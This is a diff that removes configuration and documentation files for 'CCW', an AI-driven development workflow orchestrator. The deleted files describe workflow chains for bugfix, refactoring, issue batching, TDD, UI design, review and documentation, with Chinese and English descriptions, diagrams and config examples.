"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "DAG并行执行" }
}
}
],
"total_steps": 3,
"estimated_time": "1-4 hours"
},
"tdd": {
"name": "Test-Driven Development",
"description": "TDD规划 + 执行 + CLI验证",
"complexity": ["medium", "high"],
"steps": [
{
"command": "/workflow:tdd-plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
},
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
}
},
{
"command": "/workflow:tdd-verify",
"optional": false,
"auto_continue": false,
"cli_hint": {
"coverage_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
}
],
"total_steps": 3,
"estimated_time": "1-3 hours"
},
"ui": {
"name": "UI-First Development",
"description": "UI设计 + 规划 + 执行",
"complexity": ["medium", "high"],
"variants": {
"explore": {
"steps": [
{ "command": "/workflow:ui-design:explore-auto", "optional": false, "auto_continue": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
]
},
"imitate": {
"steps": [
{ "command": "/workflow:ui-design:imitate-auto", "optional": false, "auto_continue": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
]
}
},
"total_steps": 4,
"estimated_time": "2-4 hours"
},
"review-fix": {
"name": "Review and Fix",
"description": "CLI多维审查 + 自动修复",
"complexity": ["medium"],
"steps": [
{
"command": "/workflow:review-session-cycle",
"optional": false,
"auto_continue": false,
"cli_hint": {
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
}
},
{
"command": "/workflow:review-fix",
"optional": true,
"auto_continue": false,
"cli_hint": {
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
}
}
],
"total_steps": 2,
"estimated_time": "30-90 min"
},
"docs": {
"name": "Documentation",
"description": "CLI批量文档生成",
"complexity": ["low", "medium"],
"variants": {
"incremental": {
"steps": [
{
"command": "/memory:update-related",
"optional": false,
"auto_continue": false,
"cli_hint": {
"doc_generation": { "tool": "gemini", "mode": "write", "trigger": "module_count >= 5" }
}
}
]
},
"full": {
"steps": [
{ "command": "/memory:docs", "optional": false, "auto_continue": false },
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"batch_doc": { "tool": "gemini", "mode": "write", "trigger": "always" }
}
}
]
}
},
"total_steps": 2,
"estimated_time": "15-60 min"
},
"cli-analysis": {
"name": "CLI Direct Analysis",
"description": "直接CLI分析获取多模型视角节省主会话token",
"complexity": ["low", "medium", "high"],
"standalone": true,
"steps": [
{
"command": "ccw cli",
"tool": "gemini",
"mode": "analysis",
"optional": false,
"auto_continue": false
}
],
"use_cases": [
"大型代码库快速理解",
"执行流追踪和数据流分析",
"架构评估和技术方案对比",
"性能瓶颈诊断"
],
"total_steps": 1,
"estimated_time": "5-15 min"
},
"cli-implement": {
"name": "CLI Direct Implementation",
"description": "直接Codex实现自主完成多步骤任务",
"complexity": ["medium", "high"],
"standalone": true,
"steps": [
{
"command": "ccw cli",
"tool": "codex",
"mode": "write",
"optional": false,
"auto_continue": false
}
],
"use_cases": [
"明确需求的功能实现",
"代码重构和迁移",
"测试生成",
"批量代码修改"
],
"total_steps": 1,
"estimated_time": "15-60 min"
},
"cli-debug": {
"name": "CLI Debug Session",
"description": "CLI调试会话利用Gemini深度诊断能力",
"complexity": ["medium", "high"],
"standalone": true,
"steps": [
{
"command": "ccw cli",
"tool": "gemini",
"mode": "analysis",
"purpose": "hypothesis-driven debugging",
"optional": false,
"auto_continue": false
}
],
"use_cases": [
"复杂bug根因分析",
"执行流异常追踪",
"状态机错误诊断",
"并发问题排查"
],
"total_steps": 1,
"estimated_time": "10-30 min"
}
},
"chain_selection_rules": {
"intent_mapping": {
"bugfix": ["bugfix"],
"feature_simple": ["rapid"],
"feature_unclear": ["full"],
"feature_complex": ["coupled"],
"issue_batch": ["issue"],
"test_driven": ["tdd"],
"ui_design": ["ui"],
"code_review": ["review-fix"],
"documentation": ["docs"],
"analysis_only": ["cli-analysis"],
"implement_only": ["cli-implement"],
"debug": ["cli-debug", "bugfix"]
},
"complexity_fallback": {
"low": "rapid",
"medium": "coupled",
"high": "full"
},
"cli_preference_rules": {
"_doc": "用户语义触发CLI工具选择",
"gemini_triggers": ["用 gemini", "gemini 分析", "让 gemini", "深度分析", "架构理解"],
"qwen_triggers": ["用 qwen", "qwen 评估", "让 qwen", "第二视角"],
"codex_triggers": ["用 codex", "codex 实现", "让 codex", "自主完成", "批量修改"]
}
}
}

View File

@@ -1,218 +0,0 @@
# Action: Bugfix Workflow
缺陷修复工作流:智能诊断 + 影响评估 + 修复
## Pattern
```
lite-fix [--hotfix]
```
## Trigger Conditions
- Keywords: "fix", "bug", "error", "crash", "broken", "fail", "修复", "报错"
- Problem symptoms described
- Error messages present
## Execution Flow
### Standard Mode
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant LF as lite-fix
participant CLI as CLI Tools
U->>O: Bug description
O->>O: Classify: bugfix (standard)
O->>LF: /workflow:lite-fix "bug"
Note over LF: Phase 1: Diagnosis
LF->>CLI: Root cause analysis (Gemini)
CLI-->>LF: diagnosis.json
Note over LF: Phase 2: Impact Assessment
LF->>LF: Risk scoring (0-10)
LF->>LF: Severity classification
LF-->>U: Impact report
Note over LF: Phase 3: Fix Strategy
LF->>LF: Generate fix options
LF-->>U: Present strategies
U->>LF: Select strategy
Note over LF: Phase 4: Verification Plan
LF->>LF: Generate test plan
LF-->>U: Verification approach
Note over LF: Phase 5: Confirmation
LF->>U: Execution method?
U->>LF: Confirm
Note over LF: Phase 6: Execute
LF->>CLI: Execute fix (Agent/Codex)
CLI-->>LF: Results
LF-->>U: Fix complete
```
### Hotfix Mode
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant LF as lite-fix
participant CLI as CLI Tools
U->>O: Urgent bug + "hotfix"
O->>O: Classify: bugfix (hotfix)
O->>LF: /workflow:lite-fix --hotfix "bug"
Note over LF: Minimal Diagnosis
LF->>CLI: Quick root cause
CLI-->>LF: Known issue?
Note over LF: Surgical Fix
LF->>LF: Single optimal fix
LF-->>U: Quick confirmation
U->>LF: Proceed
Note over LF: Smoke Test
LF->>CLI: Minimal verification
CLI-->>LF: Pass/Fail
Note over LF: Follow-up Generation
LF->>LF: Generate follow-up tasks
LF-->>U: Fix deployed + follow-ups created
```
## When to Use
### Standard Mode (/workflow:lite-fix)
**Use for**:
- 已知症状的 Bug
- 本地化修复1-5 文件)
- 非紧急问题
- 需要完整诊断
### Hotfix Mode (/workflow:lite-fix --hotfix)
**Use for**:
- 生产事故
- 紧急修复
- 明确的单点故障
- 时间敏感
**Don't use** (for either mode):
- 需要架构变更 → `/workflow:plan --mode bugfix`
- 多个相关问题 → `/issue:plan`
## Severity Classification
| Score | Severity | Response | Verification |
|-------|----------|----------|--------------|
| 8-10 | Critical | Immediate | Smoke test only |
| 6-7.9 | High | Fast track | Integration tests |
| 4-5.9 | Medium | Normal | Full test suite |
| 0-3.9 | Low | Scheduled | Comprehensive |
## Configuration
```javascript
const bugfixConfig = {
standard: {
diagnosis: {
tool: 'gemini',
depth: 'comprehensive',
timeout: 300000 // 5 min
},
impact: {
riskThreshold: 6.0, // High risk threshold
autoEscalate: true
},
verification: {
levels: ['smoke', 'integration', 'full'],
autoSelect: true // Based on severity
}
},
hotfix: {
diagnosis: {
tool: 'gemini',
depth: 'minimal',
timeout: 60000 // 1 min
},
fix: {
strategy: 'single', // Single optimal fix
surgical: true
},
followup: {
generate: true,
types: ['comprehensive-fix', 'post-mortem']
}
}
}
```
## Example Invocations
```bash
# Standard bug fix
ccw "用户头像上传失败,返回 413 错误"
→ lite-fix
→ Diagnosis: File size limit in nginx
→ Impact: 6.5 (High)
→ Fix: Update nginx config + add client validation
→ Verify: Integration test
# Production hotfix
ccw "紧急:支付网关返回 5xx 错误,影响所有用户"
→ lite-fix --hotfix
→ Quick diagnosis: API key expired
→ Surgical fix: Rotate key
→ Smoke test: Payment flow
→ Follow-ups: Key rotation automation, monitoring alert
# Unknown root cause
ccw "购物车随机丢失商品,原因不明"
→ lite-fix
→ Deep diagnosis (auto)
→ Root cause: Race condition in concurrent updates
→ Fix: Add optimistic locking
→ Verify: Concurrent test suite
```
## Output Artifacts
```
.workflow/.lite-fix/{bug-slug}-{timestamp}/
├── diagnosis.json # Root cause analysis
├── impact.json # Risk assessment
├── fix-plan.json # Fix strategy
├── task.json # Enhanced task for execution
└── followup.json # Follow-up tasks (hotfix only)
```
## Follow-up Tasks (Hotfix Mode)
```json
{
"followups": [
{
"id": "FOLLOWUP-001",
"type": "comprehensive-fix",
"title": "Complete fix for payment gateway issue",
"due": "3 days",
"description": "Implement full solution with proper error handling"
},
{
"id": "FOLLOWUP-002",
"type": "post-mortem",
"title": "Post-mortem analysis",
"due": "1 week",
"description": "Document incident and prevention measures"
}
]
}
```

View File

@@ -1,194 +0,0 @@
# Action: Coupled Workflow
复杂耦合工作流:完整规划 + 验证 + 执行
## Pattern
```
plan → action-plan-verify → execute
```
## Trigger Conditions
- Complexity: High
- Keywords: "refactor", "重构", "migrate", "迁移", "architect", "架构"
- Cross-module changes
- System-level modifications
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant PL as plan
participant VF as verify
participant EX as execute
participant RV as review
U->>O: Complex task
O->>O: Classify: coupled (high complexity)
Note over PL: Phase 1: Comprehensive Planning
O->>PL: /workflow:plan
PL->>PL: Multi-phase planning
PL->>PL: Generate IMPL_PLAN.md
PL->>PL: Generate task JSONs
PL-->>U: Present plan
Note over VF: Phase 2: Verification
U->>VF: /workflow:action-plan-verify
VF->>VF: Cross-artifact consistency
VF->>VF: Dependency validation
VF->>VF: Quality gate checks
VF-->>U: Verification report
alt Verification failed
U->>PL: Replan with issues
else Verification passed
Note over EX: Phase 3: Execution
U->>EX: /workflow:execute
EX->>EX: DAG-based parallel execution
EX-->>U: Execution complete
end
Note over RV: Phase 4: Review
U->>RV: /workflow:review
RV-->>U: Review findings
```
## When to Use
**Ideal scenarios**:
- 大规模重构
- 架构迁移
- 跨模块功能开发
- 技术栈升级
- 团队协作项目
**Avoid when**:
- 简单的局部修改
- 时间紧迫
- 独立的小功能
## Verification Checks
| Check | Description | Severity |
|-------|-------------|----------|
| Dependency Cycles | 检测循环依赖 | Critical |
| Missing Tasks | 计划与实际不符 | High |
| File Conflicts | 多任务修改同文件 | Medium |
| Coverage Gaps | 未覆盖的需求 | Medium |
## Configuration
```javascript
const coupledConfig = {
plan: {
phases: 5, // Full 5-phase planning
taskGeneration: 'action-planning-agent',
outputFormat: {
implPlan: '.workflow/plans/IMPL_PLAN.md',
taskJsons: '.workflow/tasks/IMPL-*.json'
}
},
verify: {
required: true, // Always verify before execute
autoReplan: false, // Manual replan on failure
qualityGates: ['no-cycles', 'no-conflicts', 'complete-coverage']
},
execute: {
dagParallel: true,
checkpointInterval: 3, // Checkpoint every 3 tasks
rollbackOnFailure: true
},
review: {
types: ['architecture', 'security'],
required: true
}
}
```
## Task JSON Structure
```json
{
"id": "IMPL-001",
"title": "重构认证模块核心逻辑",
"scope": "src/auth/**",
"action": "refactor",
"depends_on": [],
"modification_points": [
{
"file": "src/auth/service.ts",
"target": "AuthService",
"change": "Extract OAuth2 logic"
}
],
"acceptance": [
"所有现有测试通过",
"OAuth2 流程可用"
]
}
```
## Example Invocations
```bash
# Architecture refactoring
ccw "重构整个认证模块,从 session 迁移到 JWT"
→ plan (5 phases)
→ verify
→ execute
# System migration
ccw "将数据库从 MySQL 迁移到 PostgreSQL"
→ plan (migration strategy)
→ verify (data integrity checks)
→ execute (staged migration)
# Cross-module feature
ccw "实现跨服务的分布式事务支持"
→ plan (architectural design)
→ verify (consistency checks)
→ execute (incremental rollout)
```
## Output Artifacts
```
.workflow/
├── plans/
│ └── IMPL_PLAN.md # Comprehensive plan
├── tasks/
│ ├── IMPL-001.json
│ ├── IMPL-002.json
│ └── ...
├── verify/
│ └── verification-report.md # Verification results
└── reviews/
└── {review-type}.md # Review findings
```
## Replan Flow
When verification fails:
```javascript
if (verificationResult.status === 'failed') {
console.log(`
## Verification Failed
**Issues found**:
${verificationResult.issues.map(i => `- ${i.severity}: ${i.message}`).join('\n')}
**Options**:
1. /workflow:replan - Address issues and regenerate plan
2. /workflow:plan --force - Proceed despite issues (not recommended)
3. Review issues manually and fix plan files
`)
}
```

View File

@@ -1,93 +0,0 @@
# Documentation Workflow Action
## Pattern
```
memory:docs → execute (full)
memory:update-related (incremental)
```
## Trigger Conditions
- 关键词: "文档", "documentation", "docs", "readme", "注释"
- 变体触发:
- `incremental`: "更新", "增量", "相关"
- `full`: "全部", "完整", "所有"
## Variants
### Full Documentation
```mermaid
graph TD
A[User Input] --> B[memory:docs]
B --> C[项目结构分析]
C --> D[模块分组 ≤10/task]
D --> E[execute: 并行生成]
E --> F[README.md]
E --> G[ARCHITECTURE.md]
E --> H[API Docs]
E --> I[Module CLAUDE.md]
```
### Incremental Update
```mermaid
graph TD
A[Git Changes] --> B[memory:update-related]
B --> C[变更模块检测]
C --> D[相关文档定位]
D --> E[增量更新]
```
## Configuration
| 参数 | 默认值 | 说明 |
|------|--------|------|
| batch_size | 4 | 每agent处理模块数 |
| format | markdown | 输出格式 |
| include_api | true | 生成API文档 |
| include_diagrams | true | 生成Mermaid图 |
## CLI Integration
| 阶段 | CLI Hint | 用途 |
|------|----------|------|
| memory:docs | `gemini --mode analysis` | 项目结构分析 |
| execute | `gemini --mode write` | 文档生成 |
| update-related | `gemini --mode write` | 增量更新 |
## Slash Commands
```bash
/memory:docs # 规划全量文档生成
/memory:docs-full-cli # CLI执行全量文档
/memory:docs-related-cli # CLI执行增量文档
/memory:update-related # 更新变更相关文档
/memory:update-full # 更新所有CLAUDE.md
```
## Output Structure
```
project/
├── README.md # 项目概览
├── ARCHITECTURE.md # 架构文档
├── docs/
│ └── api/ # API文档
└── src/
└── module/
└── CLAUDE.md # 模块文档
```
## When to Use
- 新项目初始化文档
- 大版本发布前文档更新
- 代码变更后同步文档
- API文档生成
## Risk Assessment
| 风险 | 缓解措施 |
|------|----------|
| 文档与代码不同步 | git hook集成 |
| 生成内容过于冗长 | batch_size控制 |
| 遗漏重要模块 | 全量扫描验证 |

View File

@@ -1,154 +0,0 @@
# Action: Full Workflow
完整探索工作流:分析 + 头脑风暴 + 规划 + 执行
## Pattern
```
brainstorm:auto-parallel → plan → [verify] → execute
```
## Trigger Conditions
- Intent: Exploration (uncertainty detected)
- Keywords: "不确定", "不知道", "explore", "怎么做", "what if"
- No clear implementation path
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant BS as brainstorm
participant PL as plan
participant VF as verify
participant EX as execute
U->>O: Unclear task
O->>O: Classify: full
Note over BS: Phase 1: Brainstorm
O->>BS: /workflow:brainstorm:auto-parallel
BS->>BS: Multi-role parallel analysis
BS->>BS: Synthesis & recommendations
BS-->>U: Present options
U->>BS: Select direction
Note over PL: Phase 2: Plan
BS->>PL: /workflow:plan
PL->>PL: Generate IMPL_PLAN.md
PL->>PL: Generate task JSONs
PL-->>U: Review plan
Note over VF: Phase 3: Verify (optional)
U->>VF: /workflow:action-plan-verify
VF->>VF: Cross-artifact consistency
VF-->>U: Verification report
Note over EX: Phase 4: Execute
U->>EX: /workflow:execute
EX->>EX: DAG-based parallel execution
EX-->>U: Execution complete
```
## When to Use
**Ideal scenarios**:
- 产品方向探索
- 技术选型评估
- 架构设计决策
- 复杂功能规划
- 需要多角色视角
**Avoid when**:
- 任务明确简单
- 时间紧迫
- 已有成熟方案
## Brainstorm Roles
| Role | Focus | Typical Questions |
|------|-------|-------------------|
| Product Manager | 用户价值、市场定位 | "用户痛点是什么?" |
| System Architect | 技术方案、架构设计 | "如何保证可扩展性?" |
| UX Expert | 用户体验、交互设计 | "用户流程是否顺畅?" |
| Security Expert | 安全风险、合规要求 | "有哪些安全隐患?" |
| Data Architect | 数据模型、存储方案 | "数据如何组织?" |
## Configuration
```javascript
const fullConfig = {
brainstorm: {
defaultRoles: ['product-manager', 'system-architect', 'ux-expert'],
maxRoles: 5,
synthesis: true // Always generate synthesis
},
plan: {
verifyBeforeExecute: true, // Recommend verification
taskFormat: 'json' // Generate task JSONs
},
execute: {
dagParallel: true, // DAG-based parallel execution
testGeneration: 'optional' // Suggest test-gen after
}
}
```
## Continuation Points
After each phase, CCW can continue to the next:
```javascript
// After brainstorm completes
console.log(`
## Brainstorm Complete
**Next steps**:
1. /workflow:plan "基于头脑风暴结果规划实施"
2. Or refine: /workflow:brainstorm:synthesis
`)
// After plan completes
console.log(`
## Plan Complete
**Next steps**:
1. /workflow:action-plan-verify (recommended)
2. /workflow:execute (直接执行)
`)
```
## Example Invocations
```bash
# Product exploration
ccw "我想做一个团队协作工具,但不确定具体方向"
→ brainstorm:auto-parallel (5 roles)
→ plan
→ execute
# Technical exploration
ccw "如何设计一个高可用的消息队列系统?"
→ brainstorm:auto-parallel (system-architect, data-architect)
→ plan
→ verify
→ execute
```
## Output Artifacts
```
.workflow/
├── brainstorm/
│ ├── {session}/
│ │ ├── role-{role}.md
│ │ └── synthesis.md
├── plans/
│ └── IMPL_PLAN.md
└── tasks/
└── IMPL-*.json
```

View File

@@ -1,201 +0,0 @@
# Action: Issue Workflow
Issue 批量处理工作流:规划 + 队列 + 批量执行
## Pattern
```
issue:plan → issue:queue → issue:execute
```
## Trigger Conditions
- Keywords: "issues", "batch", "queue", "多个", "批量"
- Multiple related problems
- Long-running fix campaigns
- Priority-based processing needed
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant IP as issue:plan
participant IQ as issue:queue
participant IE as issue:execute
U->>O: Multiple issues / batch fix
O->>O: Classify: issue
Note over IP: Phase 1: Issue Planning
O->>IP: /issue:plan
IP->>IP: Load unplanned issues
IP->>IP: Generate solutions per issue
IP->>U: Review solutions
U->>IP: Bind selected solutions
Note over IQ: Phase 2: Queue Formation
IP->>IQ: /issue:queue
IQ->>IQ: Conflict analysis
IQ->>IQ: Priority calculation
IQ->>IQ: DAG construction
IQ->>U: High-severity conflicts?
U->>IQ: Resolve conflicts
IQ->>IQ: Generate execution queue
Note over IE: Phase 3: Execution
IQ->>IE: /issue:execute
IE->>IE: DAG-based parallel execution
IE->>IE: Per-solution progress tracking
IE-->>U: Batch execution complete
```
## When to Use
**Ideal scenarios**:
- 多个相关 Bug 需要批量修复
- GitHub Issues 批量处理
- 技术债务清理
- 安全漏洞批量修复
- 代码质量改进活动
**Avoid when**:
- 单一问题 → `/workflow:lite-fix`
- 独立不相关的任务 → 分别处理
- 紧急生产问题 → `/workflow:lite-fix --hotfix`
## Issue Lifecycle
```
draft → planned → queued → executing → completed
↓ ↓
skipped on-hold
```
## Conflict Types
| Type | Description | Resolution |
|------|-------------|------------|
| File | 多个解决方案修改同一文件 | Sequential execution |
| API | API 签名变更影响 | Dependency ordering |
| Data | 数据结构变更冲突 | User decision |
| Dependency | 包依赖冲突 | Version negotiation |
| Architecture | 架构方向冲突 | User decision (high severity) |
## Configuration
```javascript
const issueConfig = {
plan: {
solutionsPerIssue: 3, // Generate up to 3 solutions
autoSelect: false, // User must bind solution
planningAgent: 'issue-plan-agent'
},
queue: {
conflictAnalysis: true,
priorityCalculation: true,
clarifyThreshold: 'high', // Ask user for high-severity conflicts
queueAgent: 'issue-queue-agent'
},
execute: {
dagParallel: true,
executionLevel: 'solution', // Execute by solution, not task
executor: 'codex',
resumable: true
}
}
```
## Example Invocations
```bash
# From GitHub Issues
ccw "批量处理所有 label:bug 的 GitHub Issues"
→ issue:new (import from GitHub)
→ issue:plan (generate solutions)
→ issue:queue (form execution queue)
→ issue:execute (batch execute)
# Tech debt cleanup
ccw "处理所有 TODO 注释和已知技术债务"
→ issue:discover (find issues)
→ issue:plan (plan solutions)
→ issue:queue (prioritize)
→ issue:execute (execute)
# Security vulnerabilities
ccw "修复所有 npm audit 报告的安全漏洞"
→ issue:new (from audit report)
→ issue:plan (upgrade strategies)
→ issue:queue (conflict resolution)
→ issue:execute (staged upgrades)
```
## Queue Structure
```json
{
"queue_id": "QUE-20251227-143000",
"status": "active",
"execution_groups": [
{
"id": "P1",
"type": "parallel",
"solutions": ["SOL-ISS-001-1", "SOL-ISS-002-1"],
"description": "Independent fixes, no file overlap"
},
{
"id": "S1",
"type": "sequential",
"solutions": ["SOL-ISS-003-1"],
"depends_on": ["P1"],
"description": "Depends on P1 completion"
}
]
}
```
## Output Artifacts
```
.workflow/issues/
├── issues.jsonl # All issues (one per line)
├── solutions/
│ ├── ISS-001.jsonl # Solutions for ISS-001
│ └── ISS-002.jsonl
├── queues/
│ ├── index.json # Queue index
│ └── QUE-xxx.json # Queue details
└── execution/
└── {queue-id}/
├── progress.json
└── results/
```
## Progress Tracking
```javascript
// Real-time progress during execution
const progress = {
queue_id: "QUE-xxx",
total_solutions: 5,
completed: 2,
in_progress: 1,
pending: 2,
current_group: "P1",
eta: "15 minutes"
}
```
## Resume Capability
```bash
# If execution interrupted
ccw "继续执行 issue 队列"
→ Detects active queue: QUE-xxx
→ Resumes from last checkpoint
→ /issue:execute --resume
```

View File

@@ -1,104 +0,0 @@
# Action: Rapid Workflow
快速迭代工作流组合:多模型协作分析 + 直接执行
## Pattern
```
lite-plan → lite-execute
```
## Trigger Conditions
- Complexity: Low to Medium
- Intent: Feature development
- Context: Clear requirements, known implementation path
- No uncertainty keywords
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant LP as lite-plan
participant LE as lite-execute
participant CLI as CLI Tools
U->>O: Task description
O->>O: Classify: rapid
O->>LP: /workflow:lite-plan "task"
LP->>LP: Complexity assessment
LP->>CLI: Parallel explorations (if needed)
CLI-->>LP: Exploration results
LP->>LP: Generate plan.json
LP->>U: Display plan, ask confirmation
U->>LP: Confirm + select execution method
LP->>LE: /workflow:lite-execute --in-memory
LE->>CLI: Execute tasks (Agent/Codex)
CLI-->>LE: Results
LE->>LE: Optional code review
LE-->>U: Execution complete
```
## When to Use
**Ideal scenarios**:
- 添加单一功能(如用户头像上传)
- 修改现有功能(如更新表单验证)
- 小型重构(如抽取公共方法)
- 添加测试用例
- 文档更新
**Avoid when**:
- 不确定实现方案
- 跨多个模块
- 需要架构决策
- 有复杂依赖关系
## Configuration
```javascript
const rapidConfig = {
explorationThreshold: {
// Force exploration if task mentions specific files
forceExplore: /\b(file|文件|module|模块|class|类)\s*[:]?\s*\w+/i,
// Skip exploration for simple tasks
skipExplore: /\b(add|添加|create|创建)\s+(comment|注释|log|日志)/i
},
defaultExecution: 'Agent', // Agent for low complexity
codeReview: {
default: 'Skip', // Skip review for simple tasks
threshold: 'medium' // Enable for medium+ complexity
}
}
```
## Example Invocations
```bash
# Simple feature
ccw "添加用户退出登录按钮"
→ lite-plan → lite-execute (Agent)
# With exploration
ccw "优化 AuthService 的 token 刷新逻辑"
→ lite-plan -e → lite-execute (Agent, Gemini review)
# Medium complexity
ccw "实现用户偏好设置的本地存储"
→ lite-plan -e → lite-execute (Codex)
```
## Output Artifacts
```
.workflow/.lite-plan/{task-slug}-{date}/
├── exploration-*.json # If exploration was triggered
├── explorations-manifest.json
└── plan.json # Implementation plan
```

View File

@@ -1,84 +0,0 @@
# Review-Fix Workflow Action
## Pattern
```
review-session-cycle → review-fix
```
## Trigger Conditions
- 关键词: "review", "审查", "检查代码", "code review", "质量检查"
- 场景: PR审查、代码质量提升、安全审计
## Execution Flow
```mermaid
graph TD
A[User Input] --> B[review-session-cycle]
B --> C{7维度分析}
C --> D[Security]
C --> E[Performance]
C --> F[Maintainability]
C --> G[Architecture]
C --> H[Code Style]
C --> I[Test Coverage]
C --> J[Documentation]
D & E & F & G & H & I & J --> K[Findings Aggregation]
K --> L{Quality Gate}
L -->|Pass| M[Report Only]
L -->|Fail| N[review-fix]
N --> O[Auto Fix]
O --> P[Re-verify]
```
## Configuration
| 参数 | 默认值 | 说明 |
|------|--------|------|
| dimensions | all | 审查维度(security,performance,etc.) |
| quality_gate | 80 | 质量门槛分数 |
| auto_fix | true | 自动修复发现的问题 |
| severity_threshold | medium | 最低关注级别 |
## CLI Integration
| 阶段 | CLI Hint | 用途 |
|------|----------|------|
| review-session-cycle | `gemini --mode analysis` | 多维度深度分析 |
| review-fix | `codex --mode write` | 自动修复问题 |
## Slash Commands
```bash
/workflow:review-session-cycle # 会话级代码审查
/workflow:review-module-cycle # 模块级代码审查
/workflow:review-fix # 自动修复审查发现
/workflow:review --type security # 专项安全审查
```
## Review Dimensions
| 维度 | 检查点 |
|------|--------|
| Security | 注入、XSS、敏感数据暴露 |
| Performance | N+1查询、内存泄漏、算法复杂度 |
| Maintainability | 代码重复、复杂度、命名 |
| Architecture | 依赖方向、层级违规、耦合度 |
| Code Style | 格式、约定、一致性 |
| Test Coverage | 覆盖率、边界用例 |
| Documentation | 注释、API文档、README |
## When to Use
- PR合并前审查
- 重构后质量验证
- 安全合规审计
- 技术债务评估
## Risk Assessment
| 风险 | 缓解措施 |
|------|----------|
| 误报过多 | severity_threshold过滤 |
| 修复引入新问题 | re-verify循环 |
| 审查不全面 | 7维度覆盖 |

View File

@@ -1,66 +0,0 @@
# TDD Workflow Action
## Pattern
```
tdd-plan → execute → tdd-verify
```
## Trigger Conditions
- 关键词: "tdd", "test-driven", "测试驱动", "先写测试", "red-green"
- 场景: 需要高质量代码保证、关键业务逻辑、回归风险高
## Execution Flow
```mermaid
graph TD
A[User Input] --> B[tdd-plan]
B --> C{生成测试任务链}
C --> D[Red Phase: 写失败测试]
D --> E[execute: 实现代码]
E --> F[Green Phase: 测试通过]
F --> G{需要重构?}
G -->|Yes| H[Refactor Phase]
H --> F
G -->|No| I[tdd-verify]
I --> J[质量报告]
```
## Configuration
| 参数 | 默认值 | 说明 |
|------|--------|------|
| coverage_target | 80% | 目标覆盖率 |
| cycle_limit | 10 | 最大Red-Green-Refactor循环 |
| strict_mode | false | 严格模式(必须先红后绿) |
## CLI Integration
| 阶段 | CLI Hint | 用途 |
|------|----------|------|
| tdd-plan | `gemini --mode analysis` | 分析测试策略 |
| execute | `codex --mode write` | 实现代码 |
| tdd-verify | `gemini --mode analysis` | 验证TDD合规性 |
## Slash Commands
```bash
/workflow:tdd-plan # 生成TDD任务链
/workflow:execute # 执行Red-Green-Refactor
/workflow:tdd-verify # 验证TDD合规性+覆盖率
```
## When to Use
- 核心业务逻辑开发
- 需要高测试覆盖率的模块
- 重构现有代码时确保不破坏功能
- 团队要求TDD实践
## Risk Assessment
| 风险 | 缓解措施 |
|------|----------|
| 测试粒度不当 | tdd-plan阶段评估测试边界 |
| 过度测试 | 聚焦行为而非实现 |
| 循环过多 | cycle_limit限制 |

View File

@@ -1,79 +0,0 @@
# UI Design Workflow Action
## Pattern
```
ui-design:[explore|imitate]-auto → design-sync → plan → execute
```
## Trigger Conditions
- 关键词: "ui", "界面", "design", "组件", "样式", "布局", "前端"
- 变体触发:
- `imitate`: "参考", "模仿", "像", "类似"
- `explore`: 无特定参考时默认
## Variants
### Explore (探索式设计)
```mermaid
graph TD
A[User Input] --> B[ui-design:explore-auto]
B --> C[设计系统分析]
C --> D[组件结构规划]
D --> E[design-sync]
E --> F[plan]
F --> G[execute]
```
### Imitate (参考式设计)
```mermaid
graph TD
A[User Input + Reference] --> B[ui-design:imitate-auto]
B --> C[参考分析]
C --> D[风格提取]
D --> E[design-sync]
E --> F[plan]
F --> G[execute]
```
## Configuration
| 参数 | 默认值 | 说明 |
|------|--------|------|
| design_system | auto | 设计系统(auto/tailwind/mui/custom) |
| responsive | true | 响应式设计 |
| accessibility | true | 无障碍支持 |
## CLI Integration
| 阶段 | CLI Hint | 用途 |
|------|----------|------|
| explore/imitate | `gemini --mode analysis` | 设计分析、风格提取 |
| design-sync | - | 设计决策与代码库同步 |
| plan | - | 内置规划 |
| execute | `codex --mode write` | 组件实现 |
## Slash Commands
```bash
/workflow:ui-design:explore-auto # 探索式UI设计
/workflow:ui-design:imitate-auto # 参考式UI设计
/workflow:ui-design:design-sync # 设计与代码同步(关键步骤)
/workflow:ui-design:style-extract # 提取现有样式
/workflow:ui-design:codify-style # 样式代码化
```
## When to Use
- 新页面/组件开发
- UI重构或现代化
- 设计系统建立
- 参考其他产品设计
## Risk Assessment
| 风险 | 缓解措施 |
|------|----------|
| 设计不一致 | style-extract确保复用 |
| 响应式问题 | 多断点验证 |
| 可访问性缺失 | a11y检查集成 |

View File

@@ -1,435 +0,0 @@
# CCW Orchestrator
无状态编排器:分析输入 → 选择工作流链 → TODO 跟踪执行
## Architecture
```
┌──────────────────────────────────────────────────────────────────┐
│ CCW Orchestrator │
├──────────────────────────────────────────────────────────────────┤
│ │
│ Phase 1: Input Analysis │
│ ├─ Parse input (natural language / explicit command) │
│ ├─ Classify intent (bugfix / feature / issue / ui / docs) │
│ └─ Assess complexity (low / medium / high) │
│ │
│ Phase 2: Chain Selection │
│ ├─ Load index/workflow-chains.json │
│ ├─ Match intent → chain(s) │
│ ├─ Filter by complexity │
│ └─ Select optimal chain │
│ │
│ Phase 3: User Confirmation (optional) │
│ ├─ Display selected chain and steps │
│ └─ Allow modification or manual selection │
│ │
│ Phase 4: TODO Tracking Setup │
│ ├─ Create TodoWrite with chain steps │
